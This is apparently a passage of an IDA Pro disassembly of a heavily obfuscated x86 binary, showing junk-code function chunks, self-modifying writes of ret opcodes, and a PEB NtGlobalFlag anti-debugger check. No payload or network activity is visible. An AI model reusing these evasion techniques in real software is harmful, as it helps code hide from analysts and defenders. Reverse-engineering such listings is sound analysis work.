; [00000001 BYTES: COLLAPSED FUNCTION nullsub_391. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_459B8D:				; CODE XREF: hvvrg7ie:004390A3j
		jmp	loc_439662
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447BD1

loc_459B92:				; CODE XREF: sub_447BD1+1Cj
		add	edx, 0C50F8143h
		add	eax, edx
		pop	edx
		mov	edx, [esp-8+arg_4]
		push	ebx
		mov	ebx, eax
		xchg	ebx, [esp-4+arg_0]
		mov	eax, edx
		jmp	loc_458EA4
; END OF FUNCTION CHUNK	FOR sub_447BD1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44BFF5

loc_459BAB:				; CODE XREF: sub_44BFF5+5j
		push	eax
		push	4C91A0h
		mov	eax, [ebp-10h]

loc_459BB4:				; CODE XREF: sub_4414F6:loc_449EA4j
		push	eax
		call	sub_43FA98
		test	eax, eax
		jz	loc_45A9CE
		jmp	loc_43CCEC
; END OF FUNCTION CHUNK	FOR sub_44BFF5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44059F

loc_459BC7:				; CODE XREF: sub_44059F:loc_442DADj
					; sub_44B135+Aj
		mov	al, [eax]
		sub	al, 99h
		mov	edx, [ebp-4]
		imul	byte ptr [edx]
		cmp	al, 0A4h
		jz	loc_441F88
		jmp	loc_441499
; END OF FUNCTION CHUNK	FOR sub_44059F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B9BB

loc_459BDD:				; CODE XREF: sub_45B9BB-1310Cj
		mov	ecx, 0B71C74DDh
; END OF FUNCTION CHUNK	FOR sub_45B9BB

; =============== S U B	R O U T	I N E =======================================



sub_459BE2	proc near		; CODE XREF: sub_452A79:loc_452A7Fp
		xchg	esi, [esp+0]
		pop	esi
		call	sub_454E54
		mov	eax, 20413B0Fh
		push	offset sub_4406E9
		jmp	nullsub_380
sub_459BE2	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_458095

loc_459BFA:				; CODE XREF: sub_458095:loc_44EE19j
		push	eax
		jmp	loc_45832D
; END OF FUNCTION CHUNK	FOR sub_458095
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44059F

loc_459C00:				; CODE XREF: sub_44059Fj
		mov	edx, ds:dword_457B4C
		or	edx, edx
		jnz	loc_43C386
		jmp	loc_451FB8
; END OF FUNCTION CHUNK	FOR sub_44059F
; ---------------------------------------------------------------------------

loc_459C13:				; CODE XREF: hvvrg7ie:loc_4507A5j
		jge	loc_4485F3
		xor	esi, 0E9CF485Bh
		cmp	eax, 7853050Ch
		jmp	loc_4485E7
; ---------------------------------------------------------------------------

loc_459C2A:				; DATA XREF: sub_43F272+8718o
		push	edx
		call	sub_44C5D0
; START	OF FUNCTION CHUNK FOR sub_45423F

loc_459C30:				; CODE XREF: sub_45423F-7928j
		jmp	loc_44FF89
; END OF FUNCTION CHUNK	FOR sub_45423F
; ---------------------------------------------------------------------------
		call	sub_44D47A

loc_459C3A:				; CODE XREF: hvvrg7ie:0044848Dj
		mov	esi, edx
		xchg	esi, [esp]
		push	928242B7h
		push	offset loc_449500
		jmp	locret_457EFA
; ---------------------------------------------------------------------------
		shl	ebx, 1Ch
		jmp	loc_43AAE3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45AEC9

loc_459C56:				; CODE XREF: sub_45AEC9+Dj
		call	sub_454E54
		push	0D54AE2CBh
		xchg	ebp, [esp+4+var_4]
		mov	eax, ebp
		jmp	loc_454A4F
; END OF FUNCTION CHUNK	FOR sub_45AEC9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_439B29

loc_459C6A:				; CODE XREF: sub_439B29+11EBCj
		jnp	nullsub_383
		adc	ecx, 79EE21EFh
		sub	edi, 8CFBAE9h

loc_459C7C:				; CODE XREF: sub_439B29:loc_446D31j
		mov	eax, [ebp-4]
		cmp	byte ptr [eax],	0F1h
		jmp	loc_442F06
; END OF FUNCTION CHUNK	FOR sub_439B29
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454099

loc_459C87:				; CODE XREF: sub_454099:loc_43BAEDj
					; sub_454099-1859Ej
		xor	edx, 589C1C08h
		call	sub_446A16
		push	ecx

loc_459C93:				; CODE XREF: hvvrg7ie:00455586j
		mov	ecx, eax
		xchg	ecx, [esp+0]
		ror	eax, 10h
		push	edi
		push	0DA5B2D32h
		jmp	loc_444286
; END OF FUNCTION CHUNK	FOR sub_454099
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_439873

loc_459CA6:				; CODE XREF: sub_439873+177AAj
		mov	ecx, [ebx+ecx+0Ch]
		or	ecx, ecx
		jz	loc_43BA03
		call	sub_459CC4
		jnz	loc_43BA03
		mov	eax, ebx
		jmp	loc_44C665
; END OF FUNCTION CHUNK	FOR sub_439873

; =============== S U B	R O U T	I N E =======================================



sub_459CC4	proc near		; CODE XREF: sub_44388C-4B2Dp
					; sub_44388C+9E6Dp ...
		mov	eax, [ebx+ecx]
		jmp	loc_448774
sub_459CC4	endp

; ---------------------------------------------------------------------------

loc_459CCC:				; CODE XREF: hvvrg7ie:loc_444020j
		mov	byte ptr [eax],	0C3h
; START	OF FUNCTION CHUNK FOR sub_4512A0

loc_459CCF:				; CODE XREF: sub_4512A0-1520Bj
		jmp	nullsub_382
; END OF FUNCTION CHUNK	FOR sub_4512A0
; ---------------------------------------------------------------------------
		pop	edx
		mov	eax, [esp]
		push	ecx
		mov	ecx, edx
		xchg	ecx, [esp]
		call	sub_454E54
		mov	eax, 11E35Ch
		jmp	loc_44A828
; ---------------------------------------------------------------------------

loc_459CED:				; CODE XREF: hvvrg7ie:0044B888j
		pop	esi
		or	ecx, 7E670922h
; START	OF FUNCTION CHUNK FOR sub_45B9BB

loc_459CF4:				; CODE XREF: sub_45B9BB-10148j
		and	edx, 9E4E3D80h
		add	edx, 0AA36446Ah
		xor	edx, 0E4441B89h
		push	offset sub_439B29
		jmp	nullsub_475
; END OF FUNCTION CHUNK	FOR sub_45B9BB
; ---------------------------------------------------------------------------
		push	ecx
		jmp	loc_441A6E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4435FA

loc_459D16:				; CODE XREF: sub_4435FA:loc_44A85Bj
		jbe	loc_45A3F8
		jmp	loc_44972E
; END OF FUNCTION CHUNK	FOR sub_4435FA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44CA4B

loc_459D21:				; CODE XREF: sub_44CA4B+79A9j
		push	edx
		call	sub_4591C3
; END OF FUNCTION CHUNK	FOR sub_44CA4B
; START	OF FUNCTION CHUNK FOR sub_44121E

loc_459D27:				; CODE XREF: sub_44121E+57F3j
		mov	edx, [esp+0]
		push	eax
		mov	eax, edx
		push	eax
		push	0AE5D0561h
		pop	eax
		add	eax, 91A0064Eh
		jmp	loc_44047F
; END OF FUNCTION CHUNK	FOR sub_44121E
; ---------------------------------------------------------------------------
		pushf
		jmp	sub_450D8D
; ---------------------------------------------------------------------------

loc_459D45:				; CODE XREF: hvvrg7ie:00459F51j
		cmp	ebx, ebp
		jmp	loc_44D49E

; =============== S U B	R O U T	I N E =======================================



sub_459D4C	proc near		; CODE XREF: sub_43DEC3-46D9p
					; hvvrg7ie:00458BB6j
		xchg	ecx, [esp+0]
		pop	ecx
		call	sub_44973C
		mov	eax, 0D59435E2h
		push	edx
		push	0D374B075h
		pop	edx
		jmp	loc_446C6D
sub_459D4C	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		dw 603Bh
		dd 0A09977E7h
dword_459D6C	dd 9C59BDDFh		; DATA XREF: hvvrg7ie:00452DD1w
					; sub_452AA0+6B8r
		dd 0DA8DDF9Ch
dword_459D74	dd 88EFCFE0h		; DATA XREF: sub_45B6F1+Dw
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C0DE

loc_459D78:				; CODE XREF: sub_43C0DE+160CAj
		mov	esi, 99348AD5h
		cdq
		test	edx, 85EB49B7h
		jmp	loc_43CE7C
; END OF FUNCTION CHUNK	FOR sub_43C0DE
; ---------------------------------------------------------------------------
		and	esi, ebx
		jmp	sub_44BF37
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43DB4C

loc_459D90:				; CODE XREF: hvvrg7ie:00447293j
					; sub_43DB4C+1D6EEj
		jz	loc_443A17
		jmp	loc_453382
; END OF FUNCTION CHUNK	FOR sub_43DB4C
; ---------------------------------------------------------------------------
		jle	loc_454234
		xor	eax, 9603CADDh
		jmp	sub_4441ED
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4550DA

loc_459DAC:				; CODE XREF: sub_4550DA+Ej
		and	edx, 0CC8DA815h
		add	edx, 0FC408BE5h
		push	offset sub_455F89
		jmp	loc_43FD69
; END OF FUNCTION CHUNK	FOR sub_4550DA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451B45

loc_459DC2:				; CODE XREF: sub_451B45:loc_447817j
		jz	loc_44A89A
		jmp	loc_450C89
; END OF FUNCTION CHUNK	FOR sub_451B45

; =============== S U B	R O U T	I N E =======================================

; Attributes: thunk


sub_459DCD	proc near		; CODE XREF: sub_43FE9B+Bj
		retn
sub_459DCD	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B2AC

loc_459DCE:				; CODE XREF: sub_45B2AC+6j
		jmp	loc_443A7D
; END OF FUNCTION CHUNK	FOR sub_45B2AC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454099

loc_459DD3:				; CODE XREF: sub_454099-1CA4j
		jmp	loc_446AA7
; END OF FUNCTION CHUNK	FOR sub_454099
; ---------------------------------------------------------------------------

loc_459DD8:				; CODE XREF: hvvrg7ie:00450271j
		jmp	sub_43B914
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E77C

loc_459DDD:				; CODE XREF: sub_43E77C+10j
		jmp	loc_458024
; END OF FUNCTION CHUNK	FOR sub_43E77C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C6D7

loc_459DE2:				; CODE XREF: sub_44C6D7+A461j
		xor	ebx, 759A2FF1h
		xor	eax, ecx
; END OF FUNCTION CHUNK	FOR sub_44C6D7
; START	OF FUNCTION CHUNK FOR sub_43FC15

loc_459DEA:				; CODE XREF: sub_43FC15:loc_43F662j
					; sub_44C6D7:loc_4467F3j ...
		jmp	loc_442A0C
; END OF FUNCTION CHUNK	FOR sub_43FC15
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C6D7

loc_459DEF:				; CODE XREF: sub_43FC15-5EB1j
					; sub_44C6D7:loc_44C6DAj
		xchg	esi, [esp+0]
		mov	ecx, esi
		pop	esi
		call	sub_44128B

loc_459DFA:				; CODE XREF: sub_4403B6+1925Aj
		jmp	loc_444FDA
; END OF FUNCTION CHUNK	FOR sub_44C6D7
; ---------------------------------------------------------------------------

loc_459DFF:				; CODE XREF: hvvrg7ie:0045206Dj
		jmp	loc_43EDD4
; ---------------------------------------------------------------------------

loc_459E04:				; CODE XREF: hvvrg7ie:004546C1j
		jge	loc_449586
		and	ebp, ebx
		jmp	sub_44E410
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E128

loc_459E11:				; CODE XREF: sub_43E128+B0FAj
		jb	loc_45B03A

loc_459E17:				; CODE XREF: sub_43E128:loc_44E4ACj
					; hvvrg7ie:loc_453E98j
		mov	ecx, [ebp-18h]
		push	edi
		push	43D35487h
		xchg	esi, [esp+4+var_4]
		jmp	loc_44FD47
; END OF FUNCTION CHUNK	FOR sub_43E128
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457F6F

loc_459E28:				; CODE XREF: sub_457F6F:loc_449416j
		xor	esi, 94D70409h
		rol	esi, 3
		test	esi, 100000h
		jmp	loc_447E35
; END OF FUNCTION CHUNK	FOR sub_457F6F
; ---------------------------------------------------------------------------

loc_459E3C:				; CODE XREF: hvvrg7ie:loc_44830Cj
		mov	ecx, ebx
		pop	ebx
		mov	eax, [esp]
		push	edx
		push	ebx
		jmp	loc_45B4A7
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447E20

loc_459E49:				; CODE XREF: sub_447E20:loc_4454B1j
		mov	ecx, [eax]
		jo	loc_453C98
		jmp	loc_45AD07
; END OF FUNCTION CHUNK	FOR sub_447E20
; ---------------------------------------------------------------------------

loc_459E56:				; CODE XREF: hvvrg7ie:loc_452915j
		jl	loc_43E1B6
		rol	edx, 19h
		cdq

loc_459E60:				; CODE XREF: hvvrg7ie:loc_456F99j
		xchg	esi, [ebx]
		test	ecx, 645E92A7h
		jmp	loc_4509DB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44388C

loc_459E6D:				; CODE XREF: sub_44388C-8B59j
		jnz	loc_459491
		jmp	loc_449832
; END OF FUNCTION CHUNK	FOR sub_44388C

; =============== S U B	R O U T	I N E =======================================



sub_459E78	proc near		; CODE XREF: hvvrg7ie:0044493Ej
					; sub_44713B+1p

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043D5E9 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043F23A SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00441121 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0044A1E7 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00457C2D SIZE 00000009 BYTES

		xchg	eax, [esp+0]
		pop	eax
		jb	loc_457C2D
		mov	eax, [esp+0]
		push	edx
		jmp	loc_441121
sub_459E78	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457F50

loc_459E8B:				; CODE XREF: sub_457F50:loc_43C4C5j
					; hvvrg7ie:004592D7j
		add	edx, 0BAA2E34Dh
		xchg	edx, [esp+0]
		jmp	loc_45973D
; END OF FUNCTION CHUNK	FOR sub_457F50
; ---------------------------------------------------------------------------
		push	397468B0h
		jmp	loc_459A0E
; ---------------------------------------------------------------------------

loc_459EA3:				; DATA XREF: sub_43F0A1+2DC4o
		pop	ecx
		pop	ecx
		call	sub_441BE0
; START	OF FUNCTION CHUNK FOR sub_43A564

loc_459EAA:				; CODE XREF: sub_43A564+1FF4Ej
		jmp	loc_44113C
; END OF FUNCTION CHUNK	FOR sub_43A564
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_453. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440C05

loc_459EB0:				; CODE XREF: sub_440C05-581Aj
					; sub_4439E7+Ej
		rol	eax, 10h
		push	eax
		call	sub_43E7F3
		retn
; END OF FUNCTION CHUNK	FOR sub_440C05
; ---------------------------------------------------------------------------

loc_459EBA:				; CODE XREF: hvvrg7ie:00454F11j
		jmp	loc_4500DF
; ---------------------------------------------------------------------------

loc_459EBF:				; CODE XREF: hvvrg7ie:00452466j
		jmp	loc_450F55
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444593

loc_459EC4:				; CODE XREF: sub_444593+CDCj
		jmp	sub_447162
; END OF FUNCTION CHUNK	FOR sub_444593
; ---------------------------------------------------------------------------

loc_459EC9:				; CODE XREF: hvvrg7ie:0044269Dj
		jmp	sub_450C5A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44007A

loc_459ECE:				; CODE XREF: sub_44007A+11j
		jmp	nullsub_547
; END OF FUNCTION CHUNK	FOR sub_44007A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_441B2C

loc_459ED3:				; CODE XREF: sub_441B2C:loc_43913Fj
		jmp	sub_450C5A
; END OF FUNCTION CHUNK	FOR sub_441B2C
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_323. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4529EA

loc_459ED9:				; CODE XREF: sub_4529EA+7D94j
		mov	eax, [ebp-0Ch]
		mov	[ebp-1Ch], eax
		jmp	loc_44F4C0
; END OF FUNCTION CHUNK	FOR sub_4529EA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D964

loc_459EE4:				; CODE XREF: sub_43D964+7A46j
		jnz	loc_43D7F8

loc_459EEA:				; CODE XREF: sub_458F33+Bj
		jmp	loc_454CC2
; END OF FUNCTION CHUNK	FOR sub_43D964
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4571A0

loc_459EEF:				; CODE XREF: sub_4571A0+14j
		jmp	loc_446E38
; END OF FUNCTION CHUNK	FOR sub_4571A0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451E9F

loc_459EF4:				; CODE XREF: sub_451E9F+15j
		jmp	loc_4443D7
; END OF FUNCTION CHUNK	FOR sub_451E9F
; ---------------------------------------------------------------------------
		xor	ebp, edi
		cmp	esi, edi
		jmp	loc_43C99A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B6A5

loc_459F02:				; CODE XREF: sub_43B6A5+146BCj
		add	edx, 0D78AE3E3h
		jns	loc_456385
		pop	ebx
		shr	edx, 19h
		jmp	loc_45637E
; END OF FUNCTION CHUNK	FOR sub_43B6A5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E6A5

loc_459F17:				; CODE XREF: sub_44E6A5+Aj
		or	ebx, 7D6B4F61h
		jnz	loc_4580A6

loc_459F23:				; CODE XREF: sub_4585EE+1j
		jmp	loc_456728
; END OF FUNCTION CHUNK	FOR sub_44E6A5
; ---------------------------------------------------------------------------
		mov	edi, eax
		adc	ebx, 0CADA20E0h
		jnp	loc_455DD7
		jmp	loc_439021
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B6A5

loc_459F3B:				; CODE XREF: sub_43B6A5:loc_450214j
		jge	loc_44D4A6

loc_459F41:				; CODE XREF: hvvrg7ie:0044D8B1j
		jmp	loc_441048
; END OF FUNCTION CHUNK	FOR sub_43B6A5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_452B83

loc_459F46:				; CODE XREF: sub_452B83-5355j
		jmp	loc_43F436
; END OF FUNCTION CHUNK	FOR sub_452B83
; ---------------------------------------------------------------------------
		push	eax
		rol	esi, 7
		mov	eax, ecx
		jmp	loc_459D45
; ---------------------------------------------------------------------------

loc_459F56:				; CODE XREF: hvvrg7ie:loc_446C41j
		jz	loc_44663E
		jmp	loc_43AD8D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E128

loc_459F61:				; CODE XREF: sub_43E128+1C33Aj
		mov	byte ptr [eax],	0C3h
		jmp	loc_43BF14
; END OF FUNCTION CHUNK	FOR sub_43E128
; ---------------------------------------------------------------------------
		pop	edx
		mov	eax, [esp]
		push	edi
		mov	edi, edx
		xchg	edi, [esp]
		jmp	loc_44CEF0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450246

loc_459F78:				; CODE XREF: sub_450246-F56Aj
		ror	eax, 3
		push	edx

loc_459F7C:				; CODE XREF: sub_450246:loc_444F16j
		movzx	eax, word ptr [ebp-6]
		push	0C93EE857h
		pop	edx
		and	edx, 0DC43D12Ah
		rol	edx, 1Ch
		xor	edx, 183B1826h
		jmp	loc_43ED1D
; END OF FUNCTION CHUNK	FOR sub_450246
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4569C6

loc_459F9A:				; CODE XREF: sub_4569C6:loc_4426BAj
		cmp	esi, edi
		jmp	loc_446536
; END OF FUNCTION CHUNK	FOR sub_4569C6
; ---------------------------------------------------------------------------
		cmp	ecx, 4D56C246h
		jmp	loc_448C70
; ---------------------------------------------------------------------------
		jnz	loc_453EE6
		jmp	loc_4442B3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4406E9

loc_459FB7:				; CODE XREF: sub_4406E9:loc_43B862j
		and	ebx, ds:4000FBh
		add	ebx, 0FC24F2BEh
		xchg	ebx, [esp+4+var_4]
		jmp	loc_43B599
; END OF FUNCTION CHUNK	FOR sub_4406E9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44BCAE

loc_459FCB:				; CODE XREF: sub_44BCAE:loc_45B3B9j
		push	offset loc_449B6E
		jmp	loc_43BBA8
; END OF FUNCTION CHUNK	FOR sub_44BCAE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447DF9

loc_459FD5:				; CODE XREF: sub_447DF9:loc_4591F4j
		jz	sub_443802
		jmp	loc_45AEFA
; END OF FUNCTION CHUNK	FOR sub_447DF9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44A230

loc_459FE0:				; CODE XREF: sub_44A230:loc_44E7B5j
					; hvvrg7ie:0044E7C9j
		add	ebx, 7408EC27h
		xor	ebx, 9D5B6D8Bh
		add	ebx, 0E7C24F34h
		mov	[ebx], eax
		pop	ebx
		lea	eax, nullsub_275
		mov	byte ptr [eax],	0C3h
		jmp	nullsub_275
; END OF FUNCTION CHUNK	FOR sub_44A230

; =============== S U B	R O U T	I N E =======================================



sub_45A003	proc near		; CODE XREF: sub_440B7A+AC71p
					; hvvrg7ie:004557C1j

var_10		= dword	ptr -10h
arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0043F428 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0043F8F0 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0044485D SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00449722 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00452ACE SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004572CC SIZE 00000005 BYTES

		xchg	eax, [esp+0]
		pop	eax
		jnb	loc_44485D
		mov	eax, [esp-4+arg_0]
		jmp	loc_452ACE
sub_45A003	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_45A015:				; CODE XREF: hvvrg7ie:0043B772j
		mov	eax, [esp]
		push	edx
		push	edx
		push	offset sub_443404
		jmp	loc_43AB8F
; ---------------------------------------------------------------------------
		pop	edx
		mov	eax, [esp]
		push	edi
		mov	edi, edx
		jmp	loc_44573F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451F50

loc_45A030:				; CODE XREF: sub_451F50:loc_43E442j
		add	[ebp-8], eax
		mov	eax, [ebp-8]
		shr	eax, 6
		xor	[ebp-8], eax
		jmp	loc_4440FE
; END OF FUNCTION CHUNK	FOR sub_451F50
; ---------------------------------------------------------------------------

loc_45A041:				; CODE XREF: hvvrg7ie:0045273Aj
		jbe	loc_440BCB

loc_45A047:				; CODE XREF: hvvrg7ie:loc_451CAAj
		push	ebx
		push	0B7E94756h
		pop	ebx
		sub	ebx, 6C02D220h
		add	ebx, ds:4000F0h
		jns	loc_43F3DA

loc_45A060:				; CODE XREF: hvvrg7ie:0043F677j
		jmp	sub_43A87E
; ---------------------------------------------------------------------------
		mov	edx, 0CE3062ECh
		push	edi
		push	0C71A5AA5h
		pop	edi
		jmp	loc_45605B
; ---------------------------------------------------------------------------
		mov	edx, 0C90D1845h
		push	edx
		push	3657F24Dh
		pop	edx

loc_45A082:				; CODE XREF: hvvrg7ie:loc_448C70j
		add	edx, 46097B0Eh
		jmp	loc_444FD5
; ---------------------------------------------------------------------------

loc_45A08D:				; CODE XREF: hvvrg7ie:loc_4457C0j
		ror	eax, 3

loc_45A090:				; CODE XREF: hvvrg7ie:loc_448E68j
		push	edx
		push	3E44D393h
; START	OF FUNCTION CHUNK FOR sub_45A234

loc_45A096:				; CODE XREF: sub_45A234:loc_4501A3j
		pop	edx
		jmp	loc_444055
; END OF FUNCTION CHUNK	FOR sub_45A234
; ---------------------------------------------------------------------------
		mov	eax, large fs:30h
		mov	eax, [eax+68h]
		push	edx
		push	0A04A72C4h
		jmp	loc_451E68

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_45A0B1	proc near		; DATA XREF: sub_447744:loc_4420D8o

; FUNCTION CHUNK AT 0043D157 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043D711 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043EC5C SIZE 00000009 BYTES
; FUNCTION CHUNK AT 00445D1F SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0044647F SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00452E6A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004554B7 SIZE 00000014 BYTES

		push	ebp
		mov	ebp, esp
		push	ecx
		mov	esp, ebp
		xchg	esi, [esp+0]
		mov	ebp, esi
		jmp	loc_43D157
sub_45A0B1	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4584F2

loc_45A0C1:				; CODE XREF: sub_4584F2:loc_443F8Fj
		test	eax, 40h
		jmp	loc_449FB9
; END OF FUNCTION CHUNK	FOR sub_4584F2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44388C

loc_45A0CC:				; CODE XREF: sub_44388C+3CF1j
					; sub_44388C:loc_449832j
		pop	ecx
		pop	ebp
		retn
; END OF FUNCTION CHUNK	FOR sub_44388C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E68D

loc_45A0CF:				; CODE XREF: sub_44E68D+Dj
		jmp	loc_459767
; END OF FUNCTION CHUNK	FOR sub_44E68D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454D37

loc_45A0D4:				; CODE XREF: hvvrg7ie:0043F389j
					; sub_454D37-FDEDj ...
		jz	sub_43931C
		push	ebp
		mov	ebp, esp
		push	ecx
		mov	esp, ebp
		jmp	loc_45676F
; END OF FUNCTION CHUNK	FOR sub_454D37
; ---------------------------------------------------------------------------

loc_45A0E5:				; CODE XREF: hvvrg7ie:0044583Aj
		sub	edi, 4607793Dh
		add	edi, 45F8C5B0h
		mov	[edi], eax
		pop	edi
; START	OF FUNCTION CHUNK FOR sub_43C0DE

loc_45A0F4:				; CODE XREF: sub_43C0DE+Ej
					; sub_43C0DE+D473j
		ror	eax, 18h
		add	eax, 681377A1h
		ror	eax, 2
		add	eax, 48E23498h
		jmp	loc_439BFF
; END OF FUNCTION CHUNK	FOR sub_43C0DE
; ---------------------------------------------------------------------------

locret_45A10B:				; CODE XREF: hvvrg7ie:loc_446122j
		retn
; ---------------------------------------------------------------------------

loc_45A10C:				; CODE XREF: hvvrg7ie:0044A199j
		and	eax, edi
		jmp	loc_450A90
; ---------------------------------------------------------------------------

locret_45A113:				; CODE XREF: hvvrg7ie:00449A57j
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F98C

loc_45A114:				; CODE XREF: sub_43F98C+1158Bj
		jmp	loc_44684B
; END OF FUNCTION CHUNK	FOR sub_43F98C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451BC8

loc_45A119:				; CODE XREF: sub_451BC8-CA85j
		jmp	loc_44782A
; END OF FUNCTION CHUNK	FOR sub_451BC8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43FEF7

loc_45A11E:				; CODE XREF: sub_43FEF7+Dj
		jmp	loc_4396B3
; END OF FUNCTION CHUNK	FOR sub_43FEF7
; ---------------------------------------------------------------------------
		sbb	ecx, 0B7542E2h
		jmp	sub_457740
; ---------------------------------------------------------------------------
		push	eax
		call	sub_445D0D
; START	OF FUNCTION CHUNK FOR sub_453E86

loc_45A134:				; CODE XREF: sub_453E86+Dj
		jmp	loc_451FC3
; END OF FUNCTION CHUNK	FOR sub_453E86
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43EF3E

loc_45A139:				; CODE XREF: sub_43EF3E+6DDCj
		jmp	nullsub_398
; END OF FUNCTION CHUNK	FOR sub_43EF3E
; ---------------------------------------------------------------------------

loc_45A13E:				; CODE XREF: hvvrg7ie:004431A6j
		jmp	locret_455B24
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B2D5

loc_45A143:				; CODE XREF: sub_44B2D5-10E49j
		jmp	sub_43F521
; END OF FUNCTION CHUNK	FOR sub_44B2D5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450F97

loc_45A148:				; CODE XREF: sub_450F97:loc_443AE8j
					; sub_450F97+2DA9j
		push	3184F27Bh
		pop	eax
		or	eax, 5DA55D73h
		xor	eax, 1372C84h
		add	eax, ebp
		push	edx
		push	2D089D2Ah
		pop	edx
		jmp	loc_443EEA
; END OF FUNCTION CHUNK	FOR sub_450F97
; ---------------------------------------------------------------------------

locret_45A168:				; CODE XREF: hvvrg7ie:loc_45AC1Cj
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440643

loc_45A169:				; CODE XREF: sub_440643+146Aj
		jmp	loc_450A20
; END OF FUNCTION CHUNK	FOR sub_440643
; ---------------------------------------------------------------------------

loc_45A16E:				; CODE XREF: hvvrg7ie:00448FE9j
		jbe	loc_43D81E

loc_45A174:				; CODE XREF: hvvrg7ie:loc_43AFD9j
		mov	eax, [esp]
		call	sub_450EA4
; START	OF FUNCTION CHUNK FOR sub_44059F

loc_45A17C:				; CODE XREF: sub_44059F:loc_43C65Ej
		xchg	ecx, [eax]
		jmp	loc_441F80
